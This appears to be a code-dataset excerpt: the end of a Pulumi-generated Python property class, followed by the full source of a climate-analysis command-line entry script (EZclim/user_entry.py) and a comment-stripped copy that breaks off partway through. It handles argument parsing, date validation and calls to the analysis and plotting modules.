@pulumi.getter(name="projectName")
def project_name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "project_name")
@project_name.setter
def project_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project_name", value)
@property
@pulumi.getter(name="repositoryName")
def repository_name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "repository_name")
@repository_name.setter
def repository_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "repository_name", value)
@property
@pulumi.getter(name="rootFolder")
def root_folder(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "root_folder")
@root_folder.setter
def root_folder(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "root_folder", value)
@property
@pulumi.getter(name="tenantId")
def tenant_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "tenant_id")
@tenant_id.setter
def tenant_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tenant_id", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
| true | true |
f725e9edf7e34a8ae2a8f7d0c50a703b007c2913 | 26,732 | py | Python | EZclim/user_entry.py | msc-acse/acse-9-independent-research-project-AdannaAkwats | 3a46de2e95b35ef095d2376e7237fad14e058b3e | [
"MIT"
] | null | null | null | EZclim/user_entry.py | msc-acse/acse-9-independent-research-project-AdannaAkwats | 3a46de2e95b35ef095d2376e7237fad14e058b3e | [
"MIT"
] | null | null | null | EZclim/user_entry.py | msc-acse/acse-9-independent-research-project-AdannaAkwats | 3a46de2e95b35ef095d2376e7237fad14e058b3e | [
"MIT"
] | 5 | 2019-06-21T16:14:28.000Z | 2021-01-22T07:53:54.000Z | """
Created by Adanna Akwataghibe (Github: AdannaAkwats)
"""
import argparse
from calendar import monthrange
from Extract import *
from Analysis import *
from WriteOutput import *
from plots import *
from utils import check_valid_order, check_analysis, check_variables_covary, print_end_statement
from calculate_indices import *
from file_entry import file_entry
from ProgressBar import *
# Booleans set when user gives a just a year (or a year and month)
class StartBools:
just_start_year = False
just_start_year_month = False
def get_date(date_entry, start=True):
"""
Separate date d-m-y into day, month and year
:param date_entry: string containing date e.g. 2020-04
:param start: if set, then it is the start date of the analysis, else it is the end date
:return: day, month, year (all integers)
"""
try:
date_ = map(int, date_entry.split('-'))
date_list = list(date_)
except ValueError:
print("ERROR in function get_date(): Date written in unrecognisable format. Please try again.")
return None
len_d = len(date_list)
day = 1
month = Month.January
year = date_list[0]
if len_d == 1: # Only the year is given
StartBools.just_start_year = True
if not start:
day = 31
month = Month.December
elif len_d == 2: # year and month are given
StartBools.just_start_year_month = True
month = date_list[1]
if not start:
day = monthrange(year, month)[1]
elif len_d == 3: # day, year and month are given
day = date_list[2]
month = date_list[1]
else:
print("ERROR in function get_date(): too many split arguments")
# check that these are valid dates
try:
datetime(year, month, day)
except ValueError:
print("ERROR in function get_date(): invalid date")
return None
return day, month, year
def user_entry():
"""
Get user input from command line or from input file and run full program.
"""
parser = argparse.ArgumentParser(prog='CLIMATE_ANALYSIS',
formatter_class=argparse.RawTextHelpFormatter,
description="""The functions will give statistical analysis of the climate data
presented
FILENAMES FORMAT
----------------
- The filenames should be in the format "{START OF FILENAME}_ens{NUM}_{YEAR}.nc", where {START OF FILENAME} is
the prefix of the file, this can be the algae type etc, {NUM} is the ensemble number and {YEAR} is the year.
OR if you have multiple years stored in one file then:
- The filenames should be in the format "{START OF FILENAME}_ens{NUM}_{YEAR 1}_{YEAR 2}.nc", where
{START OF FILENAME} is the prefix of the file, this can be the algae type etc, {NUM} is the ensemble number and
{YEAR 1} and {YEAR 2} are the start and end year of the data in the file.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ASSUMPTIONS
------------
- Files do not have overlapped data.
- Daily increments of data, except if the monthly tag is set in the arguments.
- Grids have constant latitude and longitude.
------------
- Some example files are in the data folder.
""")
parser._optionals.title = "other arguments"
parser.add_argument('-pf', '--prefix', nargs='+', required=True, help="<Required> This is the prefix of the file - in the filenames format section, this is the START OF FILENAME.")
parser.add_argument('start_date', nargs='+', help="""Start date of analysis
Can be in the following formats:
----------------------------------
YYYY-MM-DD : e.g. 2020-04-12
YYYY-MM : e.g. 2020-04
YYYY : e.g. 2020
- If day is not given, the 1st of the given month will be used i.e 2020-04 => 2020-04-01
- If day and month is not given, 1st Jan will be used as the start date i.e 2020 => 2020-01-01""")
parser.add_argument('-end', '--end_date', nargs='*', help=""" <Not required> End date of analysis - format is the same as start_date
-----------------------------------end_date not given-------------------------------------
- If only start year is given, the end_date is automatically set to the 31 Dec of start year
- If start year and month is given, then end_date is set to the end of the start month
-----------------------------------end_date given-------------------------------------
- If day is not given, the end of the given month will be used i.e 2020-04 => 2020-04-30
- If day and month is not given, 31 Dec will be used as the end date i.e 2020 => 2020-12-31""")
parser.add_argument('-v', '--vars', nargs='+', metavar="variables", help="<Required> Variables of data to analyse",
required=True)
parser.add_argument('-p', '--plot', nargs=1, metavar=("ensemble_number"), help="""Plot map, histogram and timeseries graphs
E.g. --plot 1
The ensemble to plot must be included. """)
parser.add_argument('-m', '--monthly', action="store_true", help="Data in file is stored in monthly increments.")
group = parser.add_mutually_exclusive_group()
group.add_argument('-g', '--grid', nargs='+', type=float, metavar=("(lat, lon) or filename or linear/rotate"),
help="""
Grid Point: Latitude, Longitude
Uses grid point that latitude and longitude lies in.
Other commands:
- You can define a list of grid points in a .txt file e.g check INPUT/sample_points.txt
- Grid Point: sample_points.txt
- You can regrid to a grid (using nearest neighbour interpolation) defined in a NETCDF file:
- Grid Point: example_file.nc
Cannot be used in conjunction with sample point.
""")
group.add_argument('-s', '--sample', nargs='+', type=float, metavar=("(lat, lon) or filename or linear/rotate"),
help="""
Sample Point: Latitude, Longitude
Uses sample point given by latitude and longitude using interpolation.
Other commands:
- You can define a list of sample points in a .txt file e.g check INPUT/sample_points.txt
- Sample Point: sample_points.txt
- You can regrid to a grid (using linear interpolation) defined in a NETCDF file:
- Sample Point: example_file.nc
Cannot be used in conjunction with grid point.
""")
group.add_argument('-lc', '--lon_centre', nargs=1, type=float, help="Longitude to centre map on.")
parser.add_argument('-mk', '--mask', nargs=1, metavar="filename", help="Uses masking grid given as a file "
"(contains boolean array to be imposed on "
"the global grid).")
parser.add_argument('-o', '--output', action="store_true", help="If plot option selected, save data output of histogram and timeseries "
"analysis in "
+ directories.ANALYSIS + " as a .dat file.")
parser.add_argument('-cv', '--covary', action="store_true", help="Analysis on how the variables given in -v "
"vary with each other.")
parser.add_argument('-e', '--ens', nargs=1, type=int,
metavar="number_of_ensembles", help="<Required> The number of ensembles of the data. "
"If not set, the default value = 1", required=True)
parser.add_argument('-ht', '--hist', nargs='*',
metavar="number_of_bins_in_histogram", help=" Options for bin size selection. If not set, the "
"default value = fd (Freedman "
"Diaconis Estimator). The list of the potential "
"options are listed in: \n"
"https://docs.scipy.org/doc/numpy/reference/generated/numpy.histogram_bin_edges.html#numpy.histogram_bin_edges")
parser.add_argument('-u', '--user', nargs=2, metavar=('file_name', 'function_name'),
help="""Use function written by the user and stored in user_function folder for analysis.
file_name : name of file that contains function in user_function folder
function_name : name of function to call
Note: user functions are expected to only take in a cube as an argument. An example of a function
can be found in user_function/example_function.py
""")
parser.add_argument('-a', '--analysis', nargs='+', help="""Analysis performed on data set.
If not specified, then all analysis listed below will be performed.
Types of analysis:
- mean
- std (Standard deviation)
- rms (Root mean squared error)
- median
You can also select a combination of analysis to perform e.g. -a mean rms """)
parser.add_argument('-sp', '--spatial', action="store_true", help="Calculates averages spatially.")
parser.add_argument('-ca', '--areas', action="store_true", help="Calculate areas of grid boxes of latitude and"
" longitude and saves to NetCDF file areas.nc in results folder")
parser.add_argument('-t', '--total', action="store_true",
help="""Total ensemble stats: True/False : The analysis will be performed over the whole ensemble given.
- If set True, all the ensembles will be averaged as a collection.
- If set False, the ensembles will be averaged individually.""")
parser.add_argument('-i', '--index', metavar=('index'),
help="""Calculate index given
The control run is the FIRST file prefix set and the corresponding start/end date.
The future run is the SECOND file prefix set and the corresponding second start/end date
Types of inidices that can be calculated:
enso : The Oceanic Niño Index (ONI)
nino12 : Niño 1+2 Index
nino4 : Niño 4 Index
tni : The Trans-Niño Index (TNI)
iod : Indian Ocean Dipole (IOD) Mode Index
amo : Atlantic Multidecadal Oscillation (AMO) Index
pdo : Pacific Decadal Oscillation (PDO) Index
ao : Arctic Oscillation (AO; Northern Annular Mode) Index
aao : Antarctic Oscillation (AAO; Southern Annular Mode) Index
nao : North Atlantic Oscillation (NAO) Index
""")
# Log output
old_stdout = sys.stdout
log_file = open("output.log", "w")
sys.stdout = log_file
# Init progress bar
progress = ProgressBar(description='Climate Modelling software output', n_iter=5)
# Initialise the variables
algae_type, start, varbs, ens, end, analysis, spatial, total = None, None, None, None, None, None, None, None
plot, monthly, grid, sample, mask, output, covary, hist = None, None, None, None, None, None, None, None
lon_centre, func, calc_areas, index, lat, lon, points_sample_grid = None, None, None, None, None, None, None
second_date_given, start2, end2 = False, None, None
# If no arguments are given, use input file
if len(sys.argv) == 1:
algae_type, start, varbs, ens, end, analysis, spatial, total, plot, monthly, grid, sample, mask, output, covary, hist, lon_centre, func, calc_areas, index = file_entry()
elif len(sys.argv) == 2 and (sys.argv[1] == '-ex' or sys.argv[1] == '--example'):
algae_type, start, varbs, ens, end, analysis, spatial, total, plot, monthly, grid, sample, mask, output, covary, hist, lon_centre, func, calc_areas, index = file_entry(example=True)
else:
# Arguments
args = parser.parse_args()
algae_type = args.prefix
start = args.start_date
varbs = args.vars
ens = args.ens[0]
end = args.end_date
analysis = args.analysis
spatial = args.spatial
total = args.total
plot = args.plot
monthly = args.monthly
grid = args.grid
sample = args.sample
mask = args.mask
output = args.output
covary = args.covary
hist = args.hist
lon_centre = args.lon_centre
func = args.user
calc_areas = args.areas
index = args.index
# Update progress after getting input from user
progress.update()
# Get command line arguments
argv = 'python main.py'
argv = argv + ' ' + start[0]
if len(start) == 2:
argv = argv + start[1]
argv = argv + ' -pf ' + algae_type[0]
if len(algae_type) == 2:
argv = argv + ' ' + algae_type[1]
if end:
argv = argv + ' -end ' + end[0]
if len(end) == 2:
argv = argv + ' ' + end[1]
av = ' '.join(varbs)
argv = argv + ' -v ' + av + ' -e ' + str(ens)
if end and len(start) < len(end):
print("ERROR in function user_entry: Start dates are required.")
sys.exit()
if len(algae_type) > 2:
print("ERROR in function user_entry: Too many arguemnts given for 'Prefix' argument.")
sys.exit()
if spatial and not analysis:
print("Error in function user_entry: Spatial argument cannot be set when no analysis is selected.")
sys.exit()
# All dates
day_s, mon_s, yr_s, day_e, mon_e, yr_e = None, None, None, None, None, None
day_s2, mon_s2, yr_s2, day_e2, mon_e2, yr_e2 = None, None, None, None, None, None
# Get split start date
if len(start) == 1:
day_s, mon_s, yr_s = get_date(start[0])
if not end: # If end date not given, use the end of start year
if StartBools.just_start_year:
end = str(yr_s)
elif StartBools.just_start_year_month:
end = str(yr_s) + "-" + str(mon_s)
else:
end = end[0]
# Get split end date
day_e, mon_e, yr_e = get_date(end, start=False)
# 2 end years must be given with 2 start years
if len(start) == 2 and len(end) != 2:
print("ERROR in function user_entry: Both end dates must be given with both start dates.")
sys.exit()
# If extra year is given
if len(start) == 2:
second_date_given = True
# Get first start date
StartBools.just_start_year, StartBools.just_start_year_month = False, False
day_s, mon_s, yr_s = get_date(start[0])
# Get first end date
fst_end = end[0]
day_e, mon_e, yr_e = get_date(fst_end, start=False)
# Get next start
day_s2, mon_s2, yr_s2 = get_date(start[1])
# Get next end date
end = end[1]
day_e2, mon_e2, yr_e2 = get_date(end, start=False)
elif len(start) > 2:
print("ERROR in function user_entry: Too many arguemnts given for 'Start date' argument.")
sys.exit()
# Print user input
print("Arguments:")
if len(algae_type) == 1:
print("- file prefix: ", algae_type[0])
if len(algae_type) == 2:
print("- first file prefix: ", algae_type[0])
print("- second file prefix: ", algae_type[1])
print("- variables: ", varbs)
print("- start date: " + str(yr_s) + "-" + str(mon_s) + "-" + str(day_s))
print("- end date: " + str(yr_e) + "-" + str(mon_e) + "-" + str(day_e))
if second_date_given:
print("- second start date: " + str(yr_s2) + "-" + str(mon_s2) + "-" + str(day_s2))
print("- second end date: " + str(yr_e2) + "-" + str(mon_e2) + "-" + str(day_e2))
# Check that dates are in valid order
is_valid = check_valid_order([day_s, mon_s, yr_s], [day_e, mon_e, yr_e])
if not is_valid:
print("ERROR in function user_entry: Invalid start and end date")
print(" - The end date is earlier than the start date")
sys.exit()
if second_date_given:
is_valid = check_valid_order([day_s2, mon_s2, yr_s2], [day_e2, mon_e2, yr_e2])
if not is_valid:
print("ERROR in function user_entry: Invalid second start and second end date")
print(" - The end date is earlier than the start date")
sys.exit()
print("Number of ensembles:", ens)
if analysis:
print("Analysis: ", analysis)
a_ = ' '.join(analysis)
argv = argv + ' -a ' + a_
check_analysis(analysis)
if spatial:
print("Spatial analysis option selected.")
argv = argv + ' -sp'
if total:
print("Total ensemble stats option selected.")
argv = argv + ' -t'
if plot:
print("Plotting option selected.")
argv = argv + ' -p ' + str(plot[0])
else:
plot = None
if monthly:
print("Monthly date expected.")
argv = argv + ' -m'
if grid:
if len(grid) == 2:
lat, lon = grid[0], grid[1]
print("Grid point option selected.")
argv = argv + ' -g ' + str(grid[0]) + ' ' + str(grid[1])
elif len(grid) == 1:
# Check if txt or nc file or linear or rotate
check_sample_grid_one_arg(grid, 'user_entry')
points_sample_grid = grid[0]
print("Grid point option selected.")
argv = argv + ' -g ' + str(grid[0])
else:
print("ERROR in function user_entry: Grid point argument has invalid number of arguments.")
sys.exit()
elif sample:
if len(sample) == 2:
lat, lon = sample[0], sample[1]
print("Sample point option selected.")
argv = argv + ' -s ' + str(sample[0]) + ' ' + str(sample[1])
elif len(sample) == 1:
# Check if txt or nc file or linear or rotate
check_sample_grid_one_arg(sample, 'user_entry')
points_sample_grid = sample[0]
print("Sample point option selected.")
argv = argv + ' -s ' + str(sample[0])
else:
print("ERROR in function user_entry: Sample point argument has invalid number of arguments.")
sys.exit()
if mask:
if isinstance(mask, list):
mask = mask[0]
print("Masking grid option selected.")
argv = argv + ' -mk ' + mask
elif not mask:
mask = None
if output:
print("Save analysis data output selected.")
argv = argv + ' -o'
if covary:
print("Co-varying option selected.")
argv = argv + ' -cv'
check_variables_covary(varbs)
if not hist:
hist = ['fd']
elif hist:
argv = argv + ' -ht ' + str(hist[0])
if len(hist) == 2:
argv = argv + ' ' + str(hist[1])
elif len(hist) > 2:
print("ERROR in function user_entry: Histogram argument has invalid number of arguments.")
sys.exit()
print("Histogram bin selection option:", hist)
if func:
print("User function given: " + str(func[0]) + ", " + str(func[1]))
argv = argv + ' -u ' + func[0] + ' ' + func[1]
if calc_areas:
print("Calculate areas option selected.")
argv = argv + ' -ca'
# Check index is given with second date
if index and not second_date_given:
print("ERROR in function user_entry: Index must be given with a second start date set.")
sys.exit()
if index:
print("Index option selected: " + index)
argv = argv + ' -i'
if lon_centre:
lon_centre = lon_centre[0]
print("Longitude centering option selected.")
argv = argv + ' -lc ' + str(lon_centre)
elif not lon_centre:
lon_centre = None
# Call functions to perform analysis
start = [day_s, mon_s, yr_s]
end = [day_e, mon_e, yr_e]
if second_date_given:
start2 = [day_s2, mon_s2, yr_s2]
end2 = [day_e2, mon_e2, yr_e2]
# Update progress after preocessing input from user
progress.update()
# Calculate indices
if index: # Self contained action
calculate_index(algae_type, index, varbs, start, end, start2, end2, monthly=monthly, test=True)
# Update progress after calculating index
progress.update()
progress.finish()
sys.exit()
# EXTRACT DATA FROM FILES
extract = Extract(algae_type[0], varbs, start, end, ens, monthly=monthly, lat=lat, lon=lon, grid=grid,
points_sample_grid=points_sample_grid,
lon_centre=lon_centre, maskfile=mask,
calc_areas=calc_areas)
saved, ens_files, abs_files, full_saved, dim_coords = extract.extract_data()
saved2, ens_files2, abs_files2, full_saved2 = None, None, None, None
if second_date_given:
at = None
if len(algae_type) == 2:
at = algae_type[1]
else:
at = algae_type[0]
extract = Extract(at, varbs, start2, end2, ens, monthly=monthly, lat=lat, lon=lon, grid=grid,
points_sample_grid=points_sample_grid,
lon_centre=lon_centre, maskfile=mask,
calc_areas=calc_areas)
saved2, ens_files2, abs_files2, full_saved2, _ = extract.extract_data()
# Update progress after extracting data
progress.update()
# COMPUTE ANALYSIS
anlys = Analysis(saved)
ens_stats, func_name, analysis_str, nan_indices = None, None, None, None
spat_calcs, spat_calcs2 = None, None
ens_stats2 = None
if func: # user analysis
file_name, func_name = func[0], func[1]
ens_stats = anlys.compute_user_analysis(file_name, func_name)
else:
if second_date_given:
ens_stats, spat_calcs, spat_calcs2, analysis_str, nan_indices= anlys.calc_stats_difference(saved2, analysis, total=total,
spatial=spatial, dim_coords=dim_coords)
else:
ens_stats, analysis_str, nan_indices = anlys.compute_stats_analysis(analysis, total=total,
spatial=spatial, dim_coords=dim_coords)
# Warning for mask and sample/grid
if mask is not None and lat is not None:
print("WARNING: Please ensure that sample/grid point is in the masked region.")
# Update progress after computing analysis
progress.update()
# PLOTTING
try:
if plot is not None or output:
plot_ens_num = int(plot[0]) if plot is not None else 1
# Plot histogram
create_histogram(saved, ens_stats, start, end, varbs, sel=hist, monthly=monthly,
save_out=output, ens_num=plot_ens_num, cov=covary, mask=mask,
total=total, analysis_str=analysis_str, nan_indices=nan_indices, plot=plot,
second_date_given=second_date_given, start_date2=start2, end_date2=end2, spatial=spatial)
# Only plot timeseries and map if plot is enabled
if plot is not None:
# Only plot map of analysis if using analysis: mean, median, std or rms and NOT grid/sample point
if analysis_str:
if func is None or not func:
plot_map_analysis(ens_stats, varbs, save_out=output, ens_num=plot_ens_num,
analysis_str=analysis_str, total=total,
second_date_given=second_date_given)
else:
print("WARNING: Map not plotted as user function is used.")
else:
plot_map(saved, varbs, save_out=output, ens_num=plot_ens_num, total=total,
second_date_given=second_date_given)
# Plot time series and boxplot
if analysis_str:
create_timeseries_analysis(ens_stats, start, end, varbs, analysis_str, monthly=monthly,
save_out=output, ens_num=plot_ens_num,
second_date_given=second_date_given, total=total, spatial=spatial,
calcs=spat_calcs, calcs2=spat_calcs2, plot=plot, start2=start2, end2=end2)
else:
create_timeseries(saved, start, end, varbs,
save_out=output, ens_num=plot_ens_num, func_name=func_name, monthly=monthly,
second_date_given=second_date_given, plot=plot)
# Update progress after plotting
progress.update()
except Exception as err:
print("Exception thrown in function user_entry when plotting: " + str(err))
# WRITE ANALYSIS TO NETCDF FILE
if output:
wo = WriteOutput(ens_files, abs_files, ens_stats, analysis_str, varbs,
start, end, argv, saved, full_saved,
total=total, lon_centre=lon_centre,
mask=mask, lon=lon, lat=lat,
grid=grid, user_func=func_name,
points_sample_grid=points_sample_grid,
second_date_given=second_date_given, test=True)
wo.write_analysis_to_netcdf_file()
# Update progress after writing output
progress.update()
print("PROGRAM SUCCESSFUL - TERMINAL FINISHED.")
# End logging
sys.stdout = old_stdout
log_file.close()
progress.finish()
# Print to terminal when finished
print_end_statement()
# Show graphs
if plot is not None:
plt.show()
| 46.734266 | 189 | 0.567111 | import argparse
from calendar import monthrange
from Extract import *
from Analysis import *
from WriteOutput import *
from plots import *
from utils import check_valid_order, check_analysis, check_variables_covary, print_end_statement
from calculate_indices import *
from file_entry import file_entry
from ProgressBar import *
class StartBools:
just_start_year = False
just_start_year_month = False
def get_date(date_entry, start=True):
try:
date_ = map(int, date_entry.split('-'))
date_list = list(date_)
except ValueError:
print("ERROR in function get_date(): Date written in unrecognisable format. Please try again.")
return None
len_d = len(date_list)
day = 1
month = Month.January
year = date_list[0]
if len_d == 1:
StartBools.just_start_year = True
if not start:
day = 31
month = Month.December
elif len_d == 2:
StartBools.just_start_year_month = True
month = date_list[1]
if not start:
day = monthrange(year, month)[1]
elif len_d == 3:
day = date_list[2]
month = date_list[1]
else:
print("ERROR in function get_date(): too many split arguments")
try:
datetime(year, month, day)
except ValueError:
print("ERROR in function get_date(): invalid date")
return None
return day, month, year
def user_entry():
parser = argparse.ArgumentParser(prog='CLIMATE_ANALYSIS',
formatter_class=argparse.RawTextHelpFormatter,
description="""The functions will give statistical analysis of the climate data
presented
FILENAMES FORMAT
----------------
- The filenames should be in the format "{START OF FILENAME}_ens{NUM}_{YEAR}.nc", where {START OF FILENAME} is
the prefix of the file, this can be the algae type etc, {NUM} is the ensemble number and {YEAR} is the year.
OR if you have multiple years stored in one file then:
- The filenames should be in the format "{START OF FILENAME}_ens{NUM}_{YEAR 1}_{YEAR 2}.nc", where
{START OF FILENAME} is the prefix of the file, this can be the algae type etc, {NUM} is the ensemble number and
{YEAR 1} and {YEAR 2} are the start and end year of the data in the file.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ASSUMPTIONS
------------
- Files do not have overlapped data.
- Daily increments of data, except if the monthly tag is set in the arguments.
- Grids have constant latitude and longitude.
------------
- Some example files are in the data folder.
""")
parser._optionals.title = "other arguments"
parser.add_argument('-pf', '--prefix', nargs='+', required=True, help="<Required> This is the prefix of the file - in the filenames format section, this is the START OF FILENAME.")
parser.add_argument('start_date', nargs='+', help="""Start date of analysis
Can be in the following formats:
----------------------------------
YYYY-MM-DD : e.g. 2020-04-12
YYYY-MM : e.g. 2020-04
YYYY : e.g. 2020
- If day is not given, the 1st of the given month will be used i.e 2020-04 => 2020-04-01
- If day and month is not given, 1st Jan will be used as the start date i.e 2020 => 2020-01-01""")
parser.add_argument('-end', '--end_date', nargs='*', help=""" <Not required> End date of analysis - format is the same as start_date
-----------------------------------end_date not given-------------------------------------
- If only start year is given, the end_date is automatically set to the 31 Dec of start year
- If start year and month is given, then end_date is set to the end of the start month
-----------------------------------end_date given-------------------------------------
- If day is not given, the end of the given month will be used i.e 2020-04 => 2020-04-30
- If day and month is not given, 31 Dec will be used as the end date i.e 2020 => 2020-12-31""")
parser.add_argument('-v', '--vars', nargs='+', metavar="variables", help="<Required> Variables of data to analyse",
required=True)
parser.add_argument('-p', '--plot', nargs=1, metavar=("ensemble_number"), help="""Plot map, histogram and timeseries graphs
E.g. --plot 1
The ensemble to plot must be included. """)
parser.add_argument('-m', '--monthly', action="store_true", help="Data in file is stored in monthly increments.")
group = parser.add_mutually_exclusive_group()
group.add_argument('-g', '--grid', nargs='+', type=float, metavar=("(lat, lon) or filename or linear/rotate"),
help="""
Grid Point: Latitude, Longitude
Uses grid point that latitude and longitude lies in.
Other commands:
- You can define a list of grid points in a .txt file e.g check INPUT/sample_points.txt
- Grid Point: sample_points.txt
- You can regrid to a grid (using nearest neighbour interpolation) defined in a NETCDF file:
- Grid Point: example_file.nc
Cannot be used in conjunction with sample point.
""")
group.add_argument('-s', '--sample', nargs='+', type=float, metavar=("(lat, lon) or filename or linear/rotate"),
help="""
Sample Point: Latitude, Longitude
Uses sample point given by latitude and longitude using interpolation.
Other commands:
- You can define a list of sample points in a .txt file e.g check INPUT/sample_points.txt
- Sample Point: sample_points.txt
- You can regrid to a grid (using linear interpolation) defined in a NETCDF file:
- Sample Point: example_file.nc
Cannot be used in conjunction with grid point.
""")
group.add_argument('-lc', '--lon_centre', nargs=1, type=float, help="Longitude to centre map on.")
parser.add_argument('-mk', '--mask', nargs=1, metavar="filename", help="Uses masking grid given as a file "
"(contains boolean array to be imposed on "
"the global grid).")
parser.add_argument('-o', '--output', action="store_true", help="If plot option selected, save data output of histogram and timeseries "
"analysis in "
+ directories.ANALYSIS + " as a .dat file.")
parser.add_argument('-cv', '--covary', action="store_true", help="Analysis on how the variables given in -v "
"vary with each other.")
parser.add_argument('-e', '--ens', nargs=1, type=int,
metavar="number_of_ensembles", help="<Required> The number of ensembles of the data. "
"If not set, the default value = 1", required=True)
parser.add_argument('-ht', '--hist', nargs='*',
metavar="number_of_bins_in_histogram", help=" Options for bin size selection. If not set, the "
"default value = fd (Freedman "
"Diaconis Estimator). The list of the potential "
"options are listed in: \n"
"https://docs.scipy.org/doc/numpy/reference/generated/numpy.histogram_bin_edges.html#numpy.histogram_bin_edges")
parser.add_argument('-u', '--user', nargs=2, metavar=('file_name', 'function_name'),
help="""Use function written by the user and stored in user_function folder for analysis.
file_name : name of file that contains function in user_function folder
function_name : name of function to call
Note: user functions are expected to only take in a cube as an argument. An example of a function
can be found in user_function/example_function.py
""")
parser.add_argument('-a', '--analysis', nargs='+', help="""Analysis performed on data set.
If not specified, then all analysis listed below will be performed.
Types of analysis:
- mean
- std (Standard deviation)
- rms (Root mean squared error)
- median
You can also select a combination of analysis to perform e.g. -a mean rms """)
parser.add_argument('-sp', '--spatial', action="store_true", help="Calculates averages spatially.")
parser.add_argument('-ca', '--areas', action="store_true", help="Calculate areas of grid boxes of latitude and"
" longitude and saves to NetCDF file areas.nc in results folder")
parser.add_argument('-t', '--total', action="store_true",
help="""Total ensemble stats: True/False : The analysis will be performed over the whole ensemble given.
- If set True, all the ensembles will be averaged as a collection.
- If set False, the ensembles will be averaged individually.""")
parser.add_argument('-i', '--index', metavar=('index'),
help="""Calculate index given
The control run is the FIRST file prefix set and the corresponding start/end date.
The future run is the SECOND file prefix set and the corresponding second start/end date
Types of inidices that can be calculated:
enso : The Oceanic Niño Index (ONI)
nino12 : Niño 1+2 Index
nino4 : Niño 4 Index
tni : The Trans-Niño Index (TNI)
iod : Indian Ocean Dipole (IOD) Mode Index
amo : Atlantic Multidecadal Oscillation (AMO) Index
pdo : Pacific Decadal Oscillation (PDO) Index
ao : Arctic Oscillation (AO; Northern Annular Mode) Index
aao : Antarctic Oscillation (AAO; Southern Annular Mode) Index
nao : North Atlantic Oscillation (NAO) Index
""")
old_stdout = sys.stdout
log_file = open("output.log", "w")
sys.stdout = log_file
progress = ProgressBar(description='Climate Modelling software output', n_iter=5)
algae_type, start, varbs, ens, end, analysis, spatial, total = None, None, None, None, None, None, None, None
plot, monthly, grid, sample, mask, output, covary, hist = None, None, None, None, None, None, None, None
lon_centre, func, calc_areas, index, lat, lon, points_sample_grid = None, None, None, None, None, None, None
second_date_given, start2, end2 = False, None, None
if len(sys.argv) == 1:
algae_type, start, varbs, ens, end, analysis, spatial, total, plot, monthly, grid, sample, mask, output, covary, hist, lon_centre, func, calc_areas, index = file_entry()
elif len(sys.argv) == 2 and (sys.argv[1] == '-ex' or sys.argv[1] == '--example'):
algae_type, start, varbs, ens, end, analysis, spatial, total, plot, monthly, grid, sample, mask, output, covary, hist, lon_centre, func, calc_areas, index = file_entry(example=True)
else:
args = parser.parse_args()
algae_type = args.prefix
start = args.start_date
varbs = args.vars
ens = args.ens[0]
end = args.end_date
analysis = args.analysis
spatial = args.spatial
total = args.total
plot = args.plot
monthly = args.monthly
grid = args.grid
sample = args.sample
mask = args.mask
output = args.output
covary = args.covary
hist = args.hist
lon_centre = args.lon_centre
func = args.user
calc_areas = args.areas
index = args.index
progress.update()
argv = 'python main.py'
argv = argv + ' ' + start[0]
if len(start) == 2:
argv = argv + start[1]
argv = argv + ' -pf ' + algae_type[0]
if len(algae_type) == 2:
argv = argv + ' ' + algae_type[1]
if end:
argv = argv + ' -end ' + end[0]
if len(end) == 2:
argv = argv + ' ' + end[1]
av = ' '.join(varbs)
argv = argv + ' -v ' + av + ' -e ' + str(ens)
if end and len(start) < len(end):
print("ERROR in function user_entry: Start dates are required.")
sys.exit()
if len(algae_type) > 2:
print("ERROR in function user_entry: Too many arguemnts given for 'Prefix' argument.")
sys.exit()
if spatial and not analysis:
print("Error in function user_entry: Spatial argument cannot be set when no analysis is selected.")
sys.exit()
day_s, mon_s, yr_s, day_e, mon_e, yr_e = None, None, None, None, None, None
day_s2, mon_s2, yr_s2, day_e2, mon_e2, yr_e2 = None, None, None, None, None, None
if len(start) == 1:
day_s, mon_s, yr_s = get_date(start[0])
if not end:
if StartBools.just_start_year:
end = str(yr_s)
elif StartBools.just_start_year_month:
end = str(yr_s) + "-" + str(mon_s)
else:
end = end[0]
day_e, mon_e, yr_e = get_date(end, start=False)
if len(start) == 2 and len(end) != 2:
print("ERROR in function user_entry: Both end dates must be given with both start dates.")
sys.exit()
if len(start) == 2:
second_date_given = True
StartBools.just_start_year, StartBools.just_start_year_month = False, False
day_s, mon_s, yr_s = get_date(start[0])
fst_end = end[0]
day_e, mon_e, yr_e = get_date(fst_end, start=False)
day_s2, mon_s2, yr_s2 = get_date(start[1])
end = end[1]
day_e2, mon_e2, yr_e2 = get_date(end, start=False)
elif len(start) > 2:
print("ERROR in function user_entry: Too many arguemnts given for 'Start date' argument.")
sys.exit()
print("Arguments:")
if len(algae_type) == 1:
print("- file prefix: ", algae_type[0])
if len(algae_type) == 2:
print("- first file prefix: ", algae_type[0])
print("- second file prefix: ", algae_type[1])
print("- variables: ", varbs)
print("- start date: " + str(yr_s) + "-" + str(mon_s) + "-" + str(day_s))
print("- end date: " + str(yr_e) + "-" + str(mon_e) + "-" + str(day_e))
if second_date_given:
print("- second start date: " + str(yr_s2) + "-" + str(mon_s2) + "-" + str(day_s2))
print("- second end date: " + str(yr_e2) + "-" + str(mon_e2) + "-" + str(day_e2))
is_valid = check_valid_order([day_s, mon_s, yr_s], [day_e, mon_e, yr_e])
if not is_valid:
print("ERROR in function user_entry: Invalid start and end date")
print(" - The end date is earlier than the start date")
sys.exit()
if second_date_given:
is_valid = check_valid_order([day_s2, mon_s2, yr_s2], [day_e2, mon_e2, yr_e2])
if not is_valid:
print("ERROR in function user_entry: Invalid second start and second end date")
